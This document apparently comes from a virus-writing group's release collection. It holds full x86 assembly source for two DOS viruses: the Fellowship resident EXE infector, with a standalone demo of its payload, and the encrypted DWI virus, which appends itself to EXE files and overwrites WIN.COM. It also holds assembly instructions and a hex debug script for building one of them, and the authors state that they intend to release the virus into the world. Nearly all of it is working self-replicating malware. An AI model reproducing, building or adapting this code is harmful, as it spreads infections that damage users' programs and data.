mov word ptr ds:[0000], 0A5F3h ; set ssi vector
mov byte ptr ds:[0002], 0CFh ; 0CF00:0A5F3h

xor si, si
mov di, si

push cs
pop ds

mov ax, 64h ; program entry
mov cx, endwrite-start ; zopy ieterations
pushf ; fake an interrupt
push es ; return to 1st seg
push ax

db 0EAh ; jmp far ptr 0:0000
db 00h, 00h, 00h, 00h

; on the fake interrupt call, control is transferred to 0000:0000,
; which contains

; rep movsb
; iret

; the movsb takes care of copying the virus to offset 0000 of the
; 1st EXE segment, and then the iret returns the virus to the
; entry point below!

trueentry:
xor ax, ax
mov ds, ax

pop word ptr ds:[0000] ; restore ssi vector
pop word ptr ds:[0002]

sti ; finally... yeesh!

pop es ; PSP segment
mov bx, 80h
mov ax, 4A00h ; decrease allocation
int 21h ; of PSP segment

push cs
pop ds
mov ax, es

mov cmdlinesegment, ax ; construct exec
mov fcb1segment, ax ; parameter block
mov fcb2segment, ax ; (see block above)
mov ax, es:[002Ch]
mov envsegment, ax

mov ax, 3521h ; get int 21h vector
int 21h

mov word ptr ds:[Old21], bx ; save vector
mov word ptr ds:[Old21+2], es

mov dx, offset int_21h_entry ; set int 21h vectr
mov ax, 2521h
int 21h

mov ah, 2Ah ; get date
int 21h

cmp dh, 9 ; the ninth?
jne dontsetflag
or byte ptr cs:[ninthflag], 1 ; flop that flipper
dontsetflag:
cli
mov es, envsegment ; environment segmnt
xor di, di
mov cx, 0FFFFh
mov al, 0
cld
searchloop:
repne scasb ; scan until we
cmp es:[di], al ; meet a dupe of
jne searchloop ; ourselves!

mov dx, di
add dx, 3

push es ; DS = PSP segment
pop ds

mov bx, cs ; stack in us
mov ss, bx ; might clear ints!!
mov es, bx
mov sp, 44Bh ; stack at 44bh
mov bx, offset paramblock
mov ax, 4B00h ; load + exec host
pushf ; fake int 21h
sti
call dword ptr cs:[Old21]

mov es, cs:[envsegment] ; release memory
mov ax, 4900h
int 21h

mov dx, 80h ; terminate and keep
mov ax, 3100h ; us resident!
int 21h

filesave dw 469h, 74Bh
old24 dw 156h, 74Bh
savedvalu1 dw 8E0h
savedvalu2 dw 0
oldattr dw 20h
readbuffer db 4Dh
db 5Ah, 0DBh, 00h, 07h, 00h, 00h
db 00h, 20h, 00h, 00h, 00h, 0FFh
db 0FFh, 00h, 00h, 00h, 00h
negativechksm dw 1990h
db 00h, 00h, 6Eh, 00h, 3Eh
db 39 dup (0)

int_24h_entry:
xor al, al
iret

int_21h_entry:
cmp ax, 0D000h ; RUTHERE?
jne checkforexecute ; No...
mov bx, 1234h
iret

checkforexecute:
cmp ax, 4B00h ; load + execute?
je yeahyeahbaby ; yepparoo

db 0EAh ; jmp far orig 21h
old21 db 9Eh, 10h, 16h, 01h

dw ?, ? ; ?!?

yeahyeahbaby:
push bp ; save caller's
push ax ; registers
push bx
push cx
push dx
push di
push si
push es
push ds
test byte ptr cs:[ninthflag], 1 ; test that flipper
jz notflagged
jmp itstheninthhoney

notflagged:
mov word ptr cs:[filesave], dx ; save file seg:ofs
mov word ptr cs:[filesave+2], ds
mov si, dx

mov ah, 19h ; get default drive
int 21h
mov dl, al ; drive code in DL

cmp byte ptr [si+1], 3Ah ; 2nd letter a ":"
jne notonanotherdisk

mov dl, byte ptr [si] ; get letter
sub dl, 'A' ; reduce to d-code
notonanotherdisk:
inc dl ; add 1, differing fc
mov ah, 36h ; get free space
int 21h

cmp ax, 0FFFFh ; error?
je getthefuckback

xor dx, dx
mul bx ; avail. sectors
mul cx ; avail. bytes

cmp ax, 7D0h ; enough left?
jae enoughleftdoit

or dx, dx ; more than 65535?
jnz enoughleftdoit

getthefuckback:
pop ds ; restore caller's
pop es ; registers
pop si
pop di
pop dx
pop cx
pop bx
pop ax
pop bp
mov ax, 4B00h
jmp dword ptr cs:[Old21] ; go to old 21h

enoughleftdoit:
cld
les di, dword ptr cs:[filesave] ; ES:DI = File seg:ofs
mov cx, 0FFFFh
mov al, 0
repne scasb ; hunt out end

mov al, es:[di-2]
and al, 5Fh ; capitalize
cmp al, 45h ; 'E'
jne getthefuckback ; non an EXE!

lds dx, dword ptr cs:[filesave] ; DS:DX = File seg:ofs
mov ax, 3D00h ; open file
int 21h
jc getthefuckback

mov bx, ax ; !!!

push cs
pop ds

mov dx, offset readbuffer ; read exe header
mov cx, 1Ch
mov ax, 3F00h
int 21h
jc closeitupandleave ; oh, the sins...

cmp word ptr [negativechksm], 1990h ; infected?
jne getonwithit
closeitupandleave:
mov ax, 3E00h ; close file
int 21h
jmp short getthefuckback

getonwithit:
mov ax, 3524h ; get int 24h vector
int 21h

mov word ptr [Old24], bx ; save it
mov word ptr [Old24+2], es

mov dx, offset int_24h_entry ; set int 24f vector
mov ax, 2524h
int 21h

lds dx, dword ptr filesave ; DS:DX = file seg:ofs
mov ax, 4300h
int 21h ; get attributes
jc whatapity ; to err is computer

mov word ptr cs:[oldattr], cx ; save attributes

and cx, 0FEh ; blank the boring
mov ax, 4301h
int 21h ; change attributes
jnc nowramitinthere
whatapity:
lds dx, dword ptr cs:[Old24] ; restore int 24h
mov ax, 2524h ; vector
int 21h
jmp getthefuckback

nowramitinthere:
cld
sti

lds dx, dword ptr cs:[filesave] ; DS:DX = file seg:ofs
mov ax, 3D02h ; open read/write
int 21h
jc whatapity

mov bx, ax ; !!!

push cs
pop ds

mov cx, 200h ; 512 (bytes per par)

mov si, offset readbuffer ; header!

mov ax, [si+16h] ; initial CS
mov word ptr [oldcsip+2], ax

mov ax, [si+14h] ; initial IP
mov word ptr [oldcsip], ax

mov ax, [si+4] ; paragraphs
cmp word ptr [si+2], 0 ; bizzare quirk
je notquirky
dec ax
notquirky:
mul cx ; dx:ax = bytes

add ax, [si+2] ; add modulo
adc dx, 0

add ax, 0Fh ; add 16 mo'
adc dx, 0

and ax, 0FFF0h

mov word ptr [savedvalu1], ax ; save new CS:IP
mov word ptr [savedvalu2], dx ; (still in bytes!!)

add ax, endwrite-start ; add virus length
adc dx, 0

div cx ; cx in paragraphs
or dx, dx
jz notquirkier
inc ax ; quirk again
notquirkier:
mov [si+4], ax ; replace paragraphs
mov [si+2], dx ; replace modulo

mov ax, word ptr [savedvalu1] ; load saved CS:IP
mov dx, word ptr [savedvalu2] ; (still in bytes!!)

mov cx, 10h ; paragraphs
div cx

sub ax, [si+8] ; loose header size

mov [si+16h], ax ; replace IP
mov ax, 0
mov [si+14h], ax ; replace cs
mov word ptr [si+12h], 1990h ; show as infected

mov dx, word ptr [savedvalu1] ; move to end as
mov cx, word ptr [savedvalu2] ; shown by header
mov ax, 4200h
int 21h

mov cx, endwrite-start ; write the virus!
mov dx, offset ds:[0]
mov ax, 4000h ; !!!
int 21h
jc thisistheendmyonlyfriend ; an error, this far?

xor cx, cx ; seek top
mov dx, cx ; !!!
mov ax, 4200h
int 21h

mov dx, offset readbuffer ; write buffer
mov cx, 1Ch
mov ax, 4000h
int 21h

thisistheendmyonlyfriend:
mov ax, 3E00h ; close file
int 21h

lds dx, dword ptr [filesave] ; DS:DX = File Seg:ofs

mov cx, cs:[oldattr] ; restore attribs
mov ax, 4301h
int 21h
jmp whatapity ; restore int 24h

savemode db 0
charcolor db 0

nicemessage1 db 'This message is dedicated to $'
nicemessage2 db 'all fellow PC users on Earth $'
nicemessage3 db ' Towards A Better Tomorrow $'
nicemessage4 db 'And A Better Place To Live In $'

itstheninthhoney:
push cs
pop ds
mov ah, 0Fh ; get video mode
int 10h

mov byte ptr [savemode], al ; save mode

mov ax, 5 ; set mode 40x25
int 10h

mov byte ptr [charcolor], 1

mov dh, 9
call setcursor

mov dx, offset nicemessage1
call printstring

mov dh, 0Ah
call setcursor

mov dx, offset nicemessage2
call printstring

mov byte ptr [charcolor], 2

mov dh, 0Ch
call setcursor

mov dx, offset nicemessage3
call printstring

mov dh, 0Dh
call setcursor

mov dx, offset nicemessage4
call printstring

mov cx, 0FFFFh ; kill time
killloop:
lodsb
loop killloop

xor ax, ax ; wait fo' a key
int 16h

mov al, byte ptr [savemode] ; restore old mode
mov ah, 0 ; on the vid
int 10h
jmp getthefuckback ; GO HOME!

printstring:
cld
mov si, dx
printloop:
lodsb
cmp al, '$'
je alldoneprinting ; end of string

mov ah, 0Eh ; write a byte
mov bh, 0 ; to tha' vid
mov bl, byte ptr [charcolor]
int 10h

jmp short printloop
alldoneprinting:
ret

setcursor:
mov dl, 5 ; set cursor pos
mov ah, 2
mov bh, 0
int 10h
ret

db ' 03/03/90 KV KL MAL ' ; whee...
endwrite:
end start
==========================================================================
; Stand alone demonstration of the Fellowship Virus activation routine.

; Assemble with:
; tasm fbomb /m2
; tlinl fbomb /t

.model tiny
.code
org 0100h
start:
jmp short itstheninthhoney

savemode db 0
charcolor db 0

nicemessage1 db 'This message is dedicated to $'
nicemessage2 db 'all fellow PC users on Earth $'
nicemessage3 db ' Towards A Better Tomorrow $'
nicemessage4 db 'And A Better Place To Live In $'

itstheninthhoney:
push cs
pop ds
mov ah, 0Fh ; get video mode
int 10h

mov byte ptr [savemode], al ; save mode

mov ax, 5 ; set mode 40x25
int 10h

mov byte ptr [charcolor], 1

mov dh, 9
call setcursor

mov dx, offset nicemessage1
call printstring

mov dh, 0Ah
call setcursor

mov dx, offset nicemessage2
call printstring

mov byte ptr [charcolor], 2

mov dh, 0Ch
call setcursor

mov dx, offset nicemessage3
call printstring

mov dh, 0Dh
call setcursor

mov dx, offset nicemessage4
call printstring

mov cx, 0FFFFh ; kill time
killloop:
lodsb
loop killloop

xor ax, ax ; wait fo' a key
int 16h

mov al, byte ptr [savemode] ; restore old mode
mov ah, 0 ; on the vid
int 10h
int 20h

printstring:
cld
mov si, dx
printloop:
lodsb
cmp al, '$'
je alldoneprinting ; end of string

mov ah, 0Eh ; write a byte
mov bh, 0 ; to tha' vid
mov bl, byte ptr [charcolor]
int 10h

jmp short printloop
alldoneprinting:
ret

setcursor:
mov dl, 5 ; set cursor pos
mov ah, 2
mov bh, 0
int 10h
ret

db ' 03/03/90 KV KL MAL ' ; whee...
endwrite:
end start
==========================================================================

====================
DWI Virus Source
By The Attitude Adjuster and AccuPunk
====================

Here's the source to one of our new older viruses... Both 'Punk and
I did a little bit on this one, but, 'Punk thought it all up... I just
kinda fucked around with the code when he said he was bored with it...
Anyway, I can't really give you too much help here, as this code isn't at
all the greatest, but, I include it to get this virus out into the world.

Umm, assemble two pass, and link to an EXE. Modfiy the header to
make the maximum memory allocation equal to the minimum, and the fucker
should run... I'm really not going to test it right now, mainly because
it's late, and I AM releasing this tonight...

===========================================================================
Virus Name: Damn Windows Idiot!
Aliases: Anti-Windows
Author(s): AccuPunk/The Attitude Adjuster
Group: Virulent Graffiti
Scan ID: [DWI]
V Status: Abortion
Discovery: Well, see, we were in LIST.COM and we saw this code...
Symptoms: EXE growth; messages; something to do with WIN.COM
Orgin: WestBumbleFuck, Ohio DipShitPeak, New York
Eff Length: 1063 Bytes
Res Length: 1280 Bytes
Type Code: PRhE - Parasitic Resident EXE Infector
Detection Method:
Removal Instructions: Cry... Delete Windows... Increase wallet space,
hire and Antivirus Professional ("...two words together that can't
make sense!").

General Comments:

DWI will become resident after first checking for it's own
presence in memory. DWI places itself into high memory, and
changes it's MCB owner to the usual DOS MCB owner segment.
This may be changed to retrive the DOS MCB owner from DOS,
in the future, but this suffices at the present.

Int 21h is revectored to Int 30h where the virus uses it for
DOS calls. The FAR PTR at Int 30h+1 is lost.

Upon the execution of any program using Int 21h/Ax=4B00h, DWI
will check the file for an 'MZ' header, and if found, infect
the file, leaving the time, date, and attributes of the file
unchanged.

DWI seems to have an adverse effect on WIN.COM when it is run.

Other than the offensive WIN.COM program, DWI will not harm any
data... If DESQView is found, the host system owner will be wired
$100,000 for choosing a decent multitasking operating system...
err... maybe not, but, we'll not screw any .COM files.

Strings Contained in the Virus:

'[DWI] AccuPunk/The Attitude Adjuster Virulent Graffiti'
'WIN.COM'

Future Revision Notes:

There will probably be no future revisions of DWI. We may optomize
it a little, and rip the engine for use in a planned virus, but,
as I said, there will probably be no DWI-B.
===========================================================================

; [][] [] [] [][][] "Damned Windows Idiot!" or Anti-Windows...
; [] ][ [] [] []
; [] [] [] [] [] An original Viral Artform by
; [] [] [] [] [] [] AccuPunk and The Attitude Adjuster of
; [] ][ [] ][][ [] [] Virulent Graffiti, 216/513/914/602/703!
; [][] ][ ][ [][][]

; "Hey, you... with the shitty logo... Yeah, you! Get over here!"

.model tiny
.code
org 100h

id_word equ '1V' ; Marker Word
; V1 in Lil' Endian
entry:
mov bx, offset endcrypt ; Virus Start
mov cx, (end_write-endcrypt)/2 ; Ieterations
Valu:
mov dx, 0000h ; Xor Word
Crypt_Loop:
xor word ptr cs:[bx], dx ; Xor It (CS Ovr'rd)
ror word ptr cs:[bx], 1 ; Roll it Right!
inc bx
inc bx
loop Crypt_Loop
EndCrypt:

push ds es ; Save Segments

push cs cs ; CS=DS=ES
pop ds es

mov ax, 0ABCDh ; R-U-There?
int 21h
cmp ax, 6969h ; Ax=6969h Vir_Ident
jne put_vir_in_mem ; No.

exit:
pop es ds ; Restore Segments

mov ax, es ; AX = PSP segment
add ax, 10h ; Adjust for PSP
mov cx, ax

add ax, word ptr cs:[stacksave] ; Adjust SS

cli
mov sp, word ptr cs:[stacksave+2] ; Set SP
mov ss, ax ; Set SS
sti

mov bx, word ptr cs:[jmpsave+2] ; Adjust CodeSeg
add bx, cx
push bx ; Save It

mov bx, word ptr cs:[jmpsave] ; Load IP
push bx ; Save It

retf ; Exit Virus

jmpsave dd 0fff00000h ; Point to INT 20h
stacksave dd ? ; Nada.

put_vir_in_mem:
xor ax,ax ; Interrupt Table
mov ds,ax
les bx, dword ptr ds:[21h*4] ; Int 21h Vector

mov word ptr cs:[old_int_21], bx ; Save Int 21h
mov word ptr ds:[30h*4],bx ; Revector 30h
mov word ptr cs:[old_int_21+2], es
mov word ptr ds:[30h*4+2], es

push cs cs ; Restore Segments
pop es ds

mov ax, 5800h ; Get Mem Alloc
int 21h

push ax ; Save Strategy

mov bx, 2
mov ax, 5801h ; Set to Last Fit
int 21h

mov bx, ((end_vir - entry) / 16) + 1
mov ah, 48h ; Allocate Block
int 21h

  


push ax ; Returned in AX
sub ax, 10h ; Base Ofs 100h
mov es, ax ; Our Segment

mov di, 100h ; Entry = 100h
mov si, di ; Entry = 100h
mov cx, end_write - entry ; Bytes to Zopy
rep movsb

xor cx, cx ; Interrupt Table
push cx
pop ds

cli
mov word ptr ds:[21h*4], offset Int_21_handler ; Set Int 21h
mov word ptr ds:[21h*4+2], ax
sti

pop ax
sub ax, 1
mov es, ax ; Point To MCB
mov word ptr es:[0001], 0008 ; Config = 0008h

mov ax, 5801h ; Reset Strategy
pop bx
int 21h

jmp exit ; Exit Stub

int_21_handler:
push ax bx cx dx si di bp es ds ; Save Registers

cmp ax, 0ABCDh ; R-U-There?
je r_u_there

cmp ax, 4B00h ; DOS Exec?
je exec_call

back_to_dos:
pop ds es bp di si dx cx bx ax ; Restore Registers

db 0eah ; JMP XXXX:YYYY
old_int_21 dd ?

remove_locks:
xor ax,ax ; Interrupt Table
mov ds,ax
les ax, dword ptr cs:[Old24] ; Get Int 24h Vector

mov word ptr ds:[24h*4], Ax ; And Replace It
mov word ptr ds:[24h*4+2], Es
jmp back_to_dos

r_u_there:
mov bp, sp ; Alter AX On Stack
mov word ptr [bp+10h], 6969h
jmp end_int_21

exec_call:
xor ax,ax ; Revector Int 24h
mov ds,ax
les ax, DWord Ptr ds:[24h*4]

mov word ptr cs:[Old24], ax ; Save Old Vector
mov word ptr cs:[Old24+2], es

mov word ptr ds:[24h*4], Offset My24 ; With Our Vector
mov word ptr ds:[24h*4+2], cs

pop es ; Caller's Ds in Es
push es

mov di, dx ; ES:DI -> filename
push cs
pop ds ; DS:SI -> "WIN.COM"
mov si, offset win_com
push si

find_top:
pop si
push si
lodsb ; AL = "W"

mov cx, 128
repnz scasb ; Scan For "W"
je check_it ; Got a "W", Check It
pop si
jmp infect ; Not WIN.COM

check_it:
mov cl, 7

check_char:
lodsb ; Load Next Character
scasb ; and Check it
jne find_top ; Leave if < >
loop check_char

pop si

nuke_windows:
push es
pop ds

mov ax, 3d02h ; Open WIN.COM
int 30h

xchg ax,bx ; Handle in BX

push cs
pop ds

mov ah, 40h ; Write WIN.COM
mov cx, (my24-win_exit)-1
mov dx, offset win_exit ; with CD 20h
int 30h

mov ah, 3eh ; Close File
int 30h

mov ah, 9 ; Show User Message
mov dx, offset win_msg
int 30h

end_int_21:
pop ds es bp di si dx cx bx ax ; Restore Registers
iret

infect: ; File Infection
push es
pop ds

mov si, dx ; DS:SI -> filename
push cs
pop es
mov di, offset fname
LoopAgain: ; Copy filename into
lodsb ; Our CodeSeg.
stosb
or al,al
jnz LoopAgain

push cs ; CS=DS=ES
pop ds

xor ax, ax ; Get Attributes
call attributes

mov word ptr [fattr], cx ; Save Attributes

mov ax, 3D00h ; Open File
int 30h
jc bad_exe

xchg ax, bx ; BX = File Handle

mov ax, 5700h ; Get File Date/Time
int 30h

mov ftime, cx ; Save Time
mov fdate, dx ; And Date

mov ah, 3Fh ; Read Header
mov cx, 1ah
mov dx, offset buffer ; Into Buffer
int 30h

call LSeekEnd ; LSeek the End

push dx ; Save File Size
push ax

mov ah, 3Eh ; Close File
int 30h

cmp word ptr [buffer], 'ZM'
jne worse_exe ; Not an EXE File

cmp word ptr [buffer+12h], id_word
jne good_exe ; Not Infected

worse_exe:
pop dx ; Remove Saved File
pop dx ; Size
bad_exe:
jmp remove_locks ; Abort Infection

good_exe:
mov al, 01h ; Overwrite Attribs
xor cx, cx
call attributes
jc worse_exe ; Catch Write-Prot
; Discs Here
push cs
pop es

mov si, offset buffer + 14h ; Save Initial CS:IP
mov di, offset jmpsave ; In Segment

movsw
movsw

sub si, 10 ; Save Initial SS:SP

movsw
movsw

pop ax dx ; Retrive File Size
push ax dx ; Save It

add ax, offset end_write - offset entry
adc dx, 0

mov cx, 512 ; Pages 512 Bytes
div cx
or dx, dx
jz no_round
inc ax ; Rounding Quirk

no_round:
mov word ptr [buffer + 4], ax ; Set Total 512 pages
mov word ptr [buffer + 2], dx ; Set Total mod 512

mov ax, word ptr [buffer + 0Ah] ; Get Minimum
add ax, (end_write - entry)/16 ; Add our Size
mov word ptr [buffer + 0ah], ax ; Put us in Minimum
mov word ptr [buffer + 0ch], ax ; and in the Maximum

pop dx ax ; Retrieve File Size

mov cl, 4
mov bx, word ptr [buffer + 8]
shl bx, cl ; BX = Header Size
sub ax, bx
sbb dx, 0 ; Subtract Header

mov cx, 10h
div cx ; Change To Para/Rem
or dx, dx
jz no_padding
sub cx, dx ; CX = Bytes to Pad
inc ax

no_padding:
push cx ; Save Pad Bytes
sub ax, 10h
mov word ptr [buffer + 14h], offset entry ; Set IP
mov word ptr [buffer + 16h], ax ; Set CS
mov word ptr [buffer + 0Eh], ax ; Set SS
mov word ptr [buffer + 10h], offset end_vir+100h ; Set SP

move_id:
mov word ptr [buffer + 12h], id_word ; Set ID Word
; Negative Checksum

mov ax, 3D02h ; Open File
mov dx, offset fname
int 30h

xchg ax, bx ; BX = File Handle

mov ah, 40h ; Write File
mov cx, 1Ah
mov dx, offset buffer
int 30h

call LSeekEnd ; LSeek to End

pop cx ; Retrieve Padding
cmp cx, 16
je no_fixup ; None Needed

mov ah, 40h ; Write File
int 30h

no_fixup:
mov ah, 2ch ; Get Time
int 21h

mov word ptr [Valu+1], Dx ; New Crypt Valu

mov si, offset writeret ; Copy Write
mov di, offset tempcrypt ; Routine
mov cx, (end_write-writeret)
rep movsb

call tempcrypt ; Call Write Routine

mov ax, 5701h ; Set File Time/Date
mov cx, ftime
mov dx, fdate
int 30h

mov ah, 3Eh ; Close File
int 30h

mov al, 01h ; Reset Attribs
mov cx, fattr
call attributes

jmp remove_locks ; Remove Int 24h

vir_ident db 0,'[DWI] AccuPunk/' ; Virus and Author
db 'The Attitude Adjuster' ; Idents

vir_group db 0,'Virulent Graffiti',0 ; Group Ident

win_com db 'WIN.COM',0 ; Target File
win_exit db 0cdh, 20h ; DOS Exit
win_msg db 0dh,0ah ; Message
db 'You''ve been caught, you DWI! You''re nothing '
db 'but a Damn Windows Idiot!',0dh,0ah
db 'Well, we at Virulent Graffiti have had it... '
db 'you''re not going to be',0dh,0ah
db 'running that bullshit for a while, ''cuz, hey, '
db 'friends don''t let friends',0dh,0ah
db 'use Windows! (and you''re damn right we''re '
db 'your friends!)',0dh,0ah,'$'
my24: ; Error Handler
mov al, 3 ; Process Terminate
iret

Attributes: ; Get/Set
mov ah, 43h
mov dx, offset fname
int 30h
ret

LSeekEnd:
mov ax, 4202h ; LSeek from End
xor cx, cx
cwd ; XOR DX, DX
int 30h ; Kudos DA
ret

WriteRet:
push bx ; Handle

mov bx, offset endcrypt ; Virus Start
mov cx, (end_write-endcrypt)/2 ; Ieterations
mov dx, Word Ptr [Valu+1] ; Xor Word
Crypt_Loop2:
rol word ptr [bx], 1 ; Roll it Left!
xor word ptr [bx], dx ; Xor It
inc bx
inc bx
loop Crypt_Loop2

pop bx ; Handle

mov ah, 40h ; Write File
mov cx, end_write - entry
mov dx, offset entry
int 30h

push bx ; Handle

mov bx, offset endcrypt ; Virus Start
mov cx, (end_write-endcrypt)/2 ; Ieterations
mov dx, Word Ptr [Valu+1] ; Xor Word
Crypt_Loop3:
xor word ptr [bx], dx ; Xor It
ror word ptr [bx], 1 ; Roll it Left!
inc bx
inc bx
loop Crypt_Loop3

pop bx ; Handle
ret ; Return
end_write:

old24 dd 0 ; Int 24h Vector
buffer db 1Ah dup (0) ; EXE Read Buffer
fname db 128 dup (0) ; Filename Buffer
fdate dw 0 ; OldFileDate
ftime dw 0 ; OldFileTime
fattr dw 0 ; OldFileAttr

tempcrypt:
db (end_write-writeret) Dup(0) ; Write Routine
end_vir:

end entry
===========================================================================
Oh, yea, and, a debug script for all you guys who, like me, had
problems assembling this mis-mash of garbage...

===========================================================================
a
db 4D 5A CE 01 05 00 00 00 02 00 E7 0F E7 0F 4A 00
db F2 06 56 31 00 01 4A 00 1C 00 00 00 00 00 00 00
db BE 30 01 8B FE B9 B1 02 AD 33 06 2E 01 AB E2 F8
db B4 0F CD 10 B4 00 CD 10 B8 03 13 B9 30 02 33 D2
db BD 30 01 CD 10 B4 09 BA 90 05 CD 21 CD 20 3E 2F
db 1E 20 1E 20 1E 20 E2 25 1E 25 1E 25 1E 25 E2 25
db 1E 25 E2 25 E2 25 E2 25 1E 25 E2 25 E2 25 E2 25
db 1E 25 1E 25 E2 25 1E 25 1E 25 E2 25 1E 25 E2 25
db 1E 25 1E 25 1E 25 1E 25 E2 25 E2 25 1E 25 E2 25
db 1E 25 1E 25 E2 25 1E 25 E2 25 E2 25 E2 25 1E 25
db 1E 25 1E 25 1E 25 E2 25 E2 25 E2 25 E2 25 1E 25
db E2 25 E2 25 E2 25 1E 25 1E 25 1E 25 E2 25 1E 25
db 1E 25 1E 25 E2 25 E2 25 1E 25 1E 25 E2 25 E2 25
db 1E 25 E2 25 E2 25 E2 25 1E 25 E2 25 E2 25 E2 25
db 1E 25 E2 25 E2 25 E2 25 1E 20 1E 20 1E 20 1E 20
db 1E 20 1E 25 1E 25 E5 25 1E 25 1E 25 1E 25 E5 25
db 1E 25 1E 25 E5 25 1E 25 1E 25 E5 25 1E 25 1E 25
db E5 25 1E 25 E5 25 1E 25 1E 25 E5 25 1E 25 E5 25
db 1E 25 1E 25 1E 25 E5 25 1E 25 1E 25 1E 25 E5 25
db E5 25 E2 25 E5 25 1E 25 1E 25 E5 25 1E 25 1E 25
db 1E 25 1E 25 E5 25 1E 25 1E 25 1E 25 E1 25 1E 25
db E5 25 1E 25 1E 25 E5 25 1E 25 E5 25 1E 25 E5 25
db 1E 25 E5 25 1E 25 1E 25 1E 25 E5 25 1E 25 1E 25
db 1E 25 1E 25 E5 25 1E 25 1E 25 1E 25 E5 25 1E 25
db 1E 25 1E 25 E5 25 1E 20 1E 20 1E 20 1E 20 1E 20
db 1E 20 1E 25 1E 25 E5 25 1E 25 1E 25 1E 25 E5 25
db 1E 25 1E 25 E5 25 1E 25 1E 25 E5 25 E2 25 E1 25
db 1E 25 1E 25 E5 25 1E 25 1E 25 E5 25 1E 25 E5 25
db 1E 25 1E 25 1E 25 E5 25 1E 25 1E 25 1E 25 E5 25
db 1E 25 E1 25 E5 25 1E 25 1E 25 E5 25 1E 25 1E 25
db 1E 25 1E 25 E5 25 1E 20 1E 20 1E 20 1E 20 1E 20
db E5 25 E2 25 E1 25 1E 25 E2 25 E1 25 1E 25 E5 25
db 1E 25 E5 25 E1 25 E1 25 1E 25 E5 25 E1 25 E1 25
db 1E 25 1E 25 E5 25 1E 25 1E 25 1E 25 E5 25 1E 25
db 1E 25 1E 25 E5 25 1E 20 1E 20 1E 20 1E 20 1E 20
db 1E 20 1E 25 1E 25 E5 25 1E 25 1E 25 1E 25 E5 25
db 1E 25 1E 25 E5 25 1E 25 1E 25 E5 25 1E 25 E5 25
db 1E 25 1E 25 E5 25 1E 25 1E 25 E5 25 1E 25 E5 25
db 1E 25 1E 25 1E 25 E5 25 E1 25 1E 25 1E 25 E5 25
db 1E 25 1E 25 E5 25 1E 25 1E 25 E5 25 1E 25 1E 25
db 1E 25 1E 25 E5 25 1E 25 1E 25 E2 25 E2 25 1E 25
db E5 25 1E 25 E5 25 1E 25 E5 25 E2 25 E2 25 E5 25
db 1E 25 E5 25 1E 25 1E 25 1E 25 E5 25 1E 25 1E 25
db 1E 25 1E 25 E5 25 1E 25 1E 25 1E 25 E5 25 1E 25
db 1E 25 1E 25 E5 25 1E 20 1E 20 1E 20 1E 20 1E 20
db 1E 20 1E 25 1E 25 1E 25 E5 25 1E 25 E2 25 E1 25
db 1E 25 1E 25 E5 25 1E 25 1E 25 E5 25 1E 25 E5 25
db 1E 25 1E 25 E1 25 E2 25 1E 25 E5 25 1E 25 E5 25
db 1E 25 1E 25 1E 25 E5 25 1E 25 1E 25 1E 25 E5 25
db 1E 25 1E 25 E5 25 1E 25 1E 25 E5 25 1E 25 1E 25
db 1E 25 1E 25 E1 25 E2 25 1E 25 E2 25 E1 25 1E 25
db E5 25 1E 25 E5 25 1E 25 E5 25 1E 25 1E 25 E5 25
db 1E 25 E5 25 1E 25 1E 25 1E 25 E5 25 1E 25 1E 25
db 1E 25 1E 25 E5 25 1E 25 1E 25 1E 25 E5 25 1E 25
db 1E 25 1E 25 E5 25 1E 20 1E 20 1E 20 1E 20 1E 20
db 1E 20 1E 25 1E 25 1E 25 1E 25 E1 25 1E 25 1E 25
db 1E 25 E1 25 E1 25 E1 25 1E 25 E1 25 1E 25 E1 25
db 1E 25 1E 25 1E 25 1E 25 E1 25 E1 25 1E 25 E1 25
db E1 25 E1 25 1E 25 1E 25 E1 25 E1 25 1E 25 E1 25
db 1E 25 1E 25 E1 25 1E 25 1E 25 E1 25 1E 20 1E 20
db 1E 20 1E 20 1E 20 1E 20 E1 25 1E 25 1E 25 1E 25
db E1 25 1E 25 E1 25 1E 25 E1 25 1E 25 1E 25 E1 25
db 1E 25 E1 25 1E 25 1E 25 1E 25 E1 25 1E 25 1E 25
db 1E 25 E1 25 E1 25 E1 25 1E 25 1E 25 E1 25 1E 25
db 1E 25 E1 25 E1 25 E1 25 1E 20 1E 20 1E 20 1E 20
db 1E 20 1E 20 1E 20 1E 20 1E 20 1E 20 1E 20 1E 20
db 1E 20 1E 20 1E 20 1E 20 1E 20 1E 20 1E 20 1E 20
db 68 20 57 20 4C 20 4B 20 4D 20 1E 20 6E 20 4C 20
db 51 20 5A 20 4B 20 5D 20 4A 20 57 20 51 20 50 20
db 1E 20 71 20 4C 20 59 20 5F 20 50 20 57 20 44 20
db 5F 20 4A 20 57 20 51 20 50 20 12 20 1E 20 0C 21
db 0F 21 08 21 11 26 0B 21 0F 21 0D 21 11 26 07 21
db 0F 21 0A 21 11 26 08 21 0E 21 0C 21 11 26 09 21
db 0E 21 0D 21 1E 20 1E 20 1E 20 1E 20 1E 20 1E 20
db 1E 20 1E 20 1E 20 1E 20 1E 20 1E 20 1E 20 1E 20
db 33 25 1E 0F 1E 60 50 4C 5B 0F 5F 48 5F 46 50 03
db 1E 58 5B 0F 49 46 4D 47 1E 5B 51 0F 4A 47 5F 41
db 55 0F 47 40 4B 0F 58 40 4C 0F 47 40 4B 5D 1E 4C
db 56 40 57 4C 5B 0F 51 49 1E 49 57 41 5B 03 1E 5E
db 4B 4E 52 46 4A 56 1E 59 57 5D 4B 5C 33 25 4E 5D
db 51 48 4C 4E 53 42 57 41 59 01 1E 78 5B 0F 5F 5B
db 1E 79 57 5D 4B 43 5B 41 4A 0F 79 5D 5F 49 58 46
db 4A 46 1E 47 5F 59 5B 0F 53 4E 5A 4A 1E 4E 52 43
db 1E 5F 51 5C 4D 46 5C 43 5B 0F 5B 49 58 40 4C 5B
db 4D 0F 4A 40 1E 5C 5B 4A 33 25 4A 47 5F 5B 1E 0F
db 51 5A 4C 0F 5D 40 5A 4A 1E 0F 57 5C 1E 40 58 0F
db 1E 5B 56 4A 1E 4D 5B 5C 4A 0F 4F 5A 5F 43 57 5B
db 47 01 1E 78 5B 0F 1E 58 57 5C 56 0F 47 40 4B 0F
db 52 5A 5D 44 1E 40 50 0F 47 40 4B 5D 1E 5B 5F 5C
db 55 0F 51 49 33 25 52 4A 5F 5D 50 46 50 48 1E 17
db 0E 57 06 19 1E 4E 4D 5C 5B 42 5C 43 47 01 33 25
db 33 25 24 00 00 00 00 00 00 0A 00 01 00 0C 00 01
db BB 13 01 B9 04 02 BA 1F 16 2E 31 17 2E D1 0F 43
db 43 E2 F6 23 1A 03 0A 21 18 6E 8D 48 8D 5D 6C CD
